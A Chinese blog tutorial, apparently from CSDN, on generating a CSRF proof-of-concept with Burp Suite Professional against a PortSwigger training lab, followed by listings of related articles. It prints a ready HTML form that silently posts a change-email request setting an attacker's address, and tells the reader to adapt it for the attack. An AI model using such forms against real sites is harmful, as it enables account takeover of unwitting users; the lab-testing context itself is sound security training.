如何通过Burp Suite专业版构建CSRF PoC

已于 2024-01-15 09:16:53 修改
阅读量1.7k 收藏 14
点赞数 13
分类专栏: 网络安全 渗透测试 文章标签: csrf
于 2024-01-15 07:52:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013129300/article/details/135588125
版权

Burp Suite是一款强大的渗透测试利器,可以利用它来高效的执行渗透攻击,接下来介绍如何通过Burp Suite Pro来构建CSRF PoC。

如果还没安装burp suite,请参阅【Burp Suite专业版本安装配置及使用指导 】

  1. 在Bupr中找到拦截的请求,右键选择Engagement tools => Generate CSRF PoC
    在这里插入图片描述
  2. 利用CSRF PoC生成器自动生成HTML
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://0a50007d0353381f8795a7ae004c001b.web-security-academy.net/my-account/change-email" method="POST" enctype="text/plain">
      <input type="hidden" name="csrf" value="ztEXkyKgBF1CquUx7mGtX5VHoeTxBZGw&amp;email&#61;attacker&#64;163&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

  1. 对生成的HTML根据攻击需要做出相应调整

  2. 将生成的HTML复制到网页中,登录到易受攻击的网站的浏览器中查看,测试是否成功发出了预期的请求并执行了相应操作。
    在这里插入图片描述

    在这里插入图片描述

参考

[1] https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-perform-csrf

推荐阅读
「 典型安全漏洞系列 」03.跨站请求伪造CSRF详解
「 典型安全漏洞系列 」02.SQL注入详解
「 典型安全漏洞系列 」01.跨站脚本攻击XSS详解

Burp入门第十二篇】使用BurpSuite实现CSRF+修改邮箱实战案例
等风来
04-06 2842
4、此时一个对话框被打开,其中包含基于所选请求的 HTML。在 HTML 中,编辑要在 PoC 攻击中更改的字段中的值。7、查看浏览器中的响应和 Burp 的 HTTP 历史记录以查看是否发生了所需的操作。思路:是否存在简单的身份验证?使用Burp发现CSRF漏洞的过程如下。
如何使用lazyCSRFBurp Suite上生成强大的CSRF PoC
HBohan的博客
12-07 1216
lazyCSRF是一款功能强大的Burp Suite插件,该工具可以帮助广大研究人员生成功能强大的CSRF(跨站请求伪造) PoCBurp Suite是一个拦截HTTP代理,是执行Web应用程序安全测试的强大工具。引入lazyCSRF之后,Burp Suite就可以直接生成CSRF PoC了。在此之前,我比较喜欢使用的是“Generate CSRF PoC”,但这个插件无法自动判断请求的内容,而且它甚至还会使用“form”来生成无法用“form”表示的 PoC,例如使用JSON作为参数或PUT请求的情况。
burpsuite生成POC验证CSRF过程及原理
热门推荐
qq_41123867的博客
02-19 1万+
一.CSRF漏洞成因: 浏览器访问web服务器A,登录状态下,再用同一个浏览器访问了恶意服务器B,服务器B返回给浏览器的页面中含有要求访问服务器A的恶意代码,用户不知情的情况下点击后,导致服务器A接收到来自服务器B的通过浏览器发起的恶意请求 根据上图可知,要验证CSRF,需要在访问网站A后获得cookie后,再访问一个会返回恶意代码的网站B,返回的恶意代码必须能导致访问网站A ,如果能通过返回的...
BurpSuite自动生成CSRF PoC
weixin_30394669的博客
05-30 570
今天才发现BurpSuite有这么强大的功能: 转载于:https://www.cnblogs.com/phoenix--/archive/2013/05/30/3107606.html
[工具] BurpSuite--快速生成CSRF POC
weixin_30273501的博客
09-04 1092
我们使用工具分析出存在csrf漏洞时,可以快速生成这个请求的poc,下面我们来看看怎么快速生成 0x00 上图是通过proxy,点击action,选择上图的选项即可生成这个请求的CSRF Poc了 当然不只是proxy有这个选项 target、Repeater等,只要展示请求信息的都有这个选项,下面列些例子 target Repeater BurpSuite很强大...
burpsuite之快速创建测试CSRFPoc页面
moonquake
03-17 2160
注意: 本篇文章使用burpsuite2021专业版,其它版本也基本适用。 一、打开目标表单页面,将代理改为burpsuite,开始抓包。 二、抓取到目标url后,选中url并右击,选择Engagement tools下的Generate CSRF Poc 三、在参数区域修改表单的值,使用自己的payload填写, 修改参数后,不要忘了点击apply(应用修改,使修改生效) 然后点击Regenerate,生成Poc表单 四、获取测试链接 点击Test in browser后,弹出链
burpsuite csrf攻击_CSRF攻击的BurpSuite实战
weixin_42499363的博客
01-11 1000
今天做的是CSRF越权攻击,原理是通过在自己网站或者目标网站,通过模拟发包,替客户端发送请求。环境配置考虑其危害性,虽然不是很大,但是考虑到安全问题,所以本次演示需自己搭建实验环境,主要内容是用PHPstudy在本地搭建一个本地网站。下载并安装PHPstudy 寻找CSRF漏洞测试网站域名www.incake.net还是老步骤,注册,点击个人中心。然后进入“发票管理”页面: 此时,发票信息页面内容...
BurpSuite手册-045-Gererate CSRF PoC.pdf
12-28
Burp Suite 是一款广泛使用的网络...总之,Burp Suite的这些功能为安全测试人员提供了全面的工具集,用于发现、理解和利用Web应用的潜在安全漏洞,特别是CSRF PoC Generator,使得对CSRF漏洞的验证变得更为便捷和直观。
BurpSuite手册-040-Burps browser.pdf
12-28
Burp Suite 是一款广泛使用的网络安全工具,主要用于web应用程序的安全测试。这款工具集合了多种功能,以...总之,Burp Suite是一个全面的web安全测试平台,其丰富的功能和灵活性使其成为安全专业人员不可或缺的工具。
burp Suite(三)之生成CSRF PoC
crystal_shrimps的博客
08-08 1088
CSRF 生成 CSRF PoC 示例 上面改参数,下面regenerate更新,然后test in browser看效果 option可以选择生成poc的表单形式,应对不同应用情况
常见poc漏洞模块,直接导入用。
07-22
一些只有你自己知道的漏洞,或者比较偏门的漏洞,就需要咱们自己来编写PoC或者是EXP。因为Goby没有开源,所以也能编写一些基于http命令执行的漏洞!
burp靶场--CSRF
qq_33168924的博客
01-25 2883
应用程序不校验csrf的有效性,只是对比body中与cookie中csrf的值是否相同,相同就接受请求,由于搜索功能没有csrf保护,并且存在cookie注入,所以可以使用搜索中cookie注入修改cookie的csrf与bodycsrf一致造成csrf攻击。步骤1:登陆两个账户,将账户A的csrfkey与csrf值替换给第二个账户B中使用,用来请求修改邮箱地址,修改成功,但是由于cookie被修改会导致账户退出,并且发现搜索功能存在cookie注入【注入的数据可以修改客户端cookie设置】,所以结合。
使用burp生成CSRFPOC验证CSRF
bring_coco的博客
12-14 3110
实验环境:phpstudy, DVWA,burpsuite 演示过程: <1>使用burp代理提交内容 (代理推荐使用FoxyProxy小插件) <2>burp中寻找CSRF POC自动化生成选项 <3>可以看到如下为自动化生成POC 自动化编写有时候有些是不能用的,最好是自己改一些 <4>将HTML代码复制到新建的csrf.html中 <5>将其打开 <6>点击请求 可以看到成功改变密码。 这种方式虽然成功了,但是必须跟
2、使用BurpSuite进行CSRF漏洞测试
D516701881的博客
12-18 6322
1.环境准备 1.1.PC端设置BurpSuite设置代理 打开BurpSuite>proxy>options,开启本地代理 导出CA证书,打开BurpSuite>proxy>options,点击Import/export CA certificate,导出证书到本地。 安装导出的证书到本地计算机,安装方法不再详述。 1.2.靶机环境 DVWA是著名的OWASP开放出来的一个在线web安全教、学平台。提供了:暴力破解、命令执行、CSRF、文件包含、SQL注入、XSS学习环境,并且分
burpsuiteCSRF测试简单说明;
白骨梦儿
03-18 4740
【技术有限,水平一般;刚刚学习,多提意见!】 CSRF:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。一般来说,CSRF是除XSS外最常见一种漏洞; CSRF攻击说明:攻击者(攻击者)利用受害者(受害者)尚未失效的身份认证信息(cookie,session等),以某种方式诱骗受害者点击攻击者精心制作的恶意链接或者访问包含恶意...
burpsuite安全练兵场-客户端12】跨站点请求伪造CSRF-12个实验(全)
最新发布
baimao__Ch的博客
06-19 1471
一、跨站点请求伪造(CSRF)1、简述:2、影响:3、原理:4、构造CSRF攻击实验1:无防御的CSRF漏洞5、利用CSRF6、针对CSRF的常见防御措施二、绕过CSRF令牌验证1、CSRF令牌2、CSRF令牌的验证取决于请求方法实验2:令牌验证取决于请求方法的CSRF3、CSRF令牌的验证取决于令牌是否存在实验3:CSRF,其中令牌验证取决于令牌是否存在4、CSRF令牌未绑定到用户会话实验4:令牌未绑定到用户会话的CSRF5、CSRF令牌绑定到非会话Cookie。
BurpSuite工具系】使用BurpSuite一次完整的测试CSRF漏洞
run_boy_2022的博客
06-14 1288
在搜索选项 network.proxy.allow_hijacking_localhost jiang 将false修改为true,双击打开我们的burpsuite工具,将这里的监听端口改为8008。火狐浏览器地址栏添加 about:config。这样本地请求就可以监听到了。下载火狐浏览器设置网络代理。打开百度,浏览器提示这个。双击该选项就会为true。
burpsuit 靶场(Cross-site request forgery)
wanan的博客
01-09 471
burpsuit 靶场(Cross-site request forgery)
使用burp suite验证是否存在csrf漏洞
总有人间一两风,填我十万八千梦
03-17 6799
burp suite中集成了验证csrf漏洞的poc,直接使用就可以,不用自己构建表单了,非常方便。用pikachu的csrf来进行验证吧。 CSRF(get) 提交修改个人信息后,截取数据包,选择如下 如下,我们将原本的手机111...修改为2222,复制burp构造的表单链接,在同一个浏览器打开(没有退出登录的前提下) 点击 数据被修改成功,存在csrf CSRF(POST) 也是一样的方式,就不再演示,如果数据被修改成功,则存在漏洞 CSRF(Token) 由于携带了
burpsuite CSRF Poc generater
12-26
使用Burp SuiteCSRF PoC Generator模块,您可以按照以下步骤生成CSRF攻击的PoC(Proof of Concept)代码: 1. 打开Burp Suite并导入目标应用程序的配置。 2. 在Burp Suite的左侧导航栏中,选择"Proxy"选项卡,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

全栈安全

点赞收藏也是赞赏~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值